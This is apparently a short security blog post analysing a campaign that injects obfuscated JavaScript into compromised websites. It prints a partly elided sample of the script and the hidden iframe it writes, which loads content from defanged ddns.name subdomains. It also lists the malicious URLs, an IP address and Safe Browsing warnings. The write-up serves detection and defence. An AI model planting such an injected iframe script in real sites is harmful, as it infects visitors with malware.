Script Injection (*.ddns.name) and Backdoors

Just a quick review of hacker attack that I came across this week.

The attackers inject a malicious script into legitimate web pages on compromised sites and update the script several time a day (sometimes they change the script code and sometimes just make sure the script is still there, in case webmasters removed it). Typical scripts looks like this:

var $E=(Date);if($E){$f=['2*%0)%5}%1','%3{%b(%9_%8...skipped...(1))[$s.$Aj]($l[$0][$s.$1k](0,1));}}return this;},$3=$l(),$f='';$pi('l\x65\x6E\x67th');if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('s cript').length > 0){document.wr ite('<i frame src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}

The scripts create invisible iframes that load malicious content from subdomains of ddns.name (ddns.name is a free dynamic DNS service). E.g.

<i frame src="hxxp://npputdzykop .ddns .name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>

hxxp://bacmdmrnxdf .ddns .name/index.php?showtopic=892380
hxxp://hjuusnhqspt .ddns .name/index.php?showtopic=892380
hxxp://kmkyqilckhi .ddns .name/index.php?showtopic=892380
hxxp://npputdzykop .ddns .name/index.php?showtopic=892380
hxxp://jnobuznhccv .ddns .name/index.php?showtopic=892380
…

Last time I checked, the malicious subdomains pointed to 37.59.74.146.

When Google detects such malware on websites, you will see the following (or similar) messages on Safe Browsing diagnostic pages:

Malicious software is hosted on 7 domain(s), including hyyjkhfgmxk .ddns .name/, google-‐analytics .com/, kmkyqilckhi.ddns.name/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including google‐‐analytics .com/

Continue »»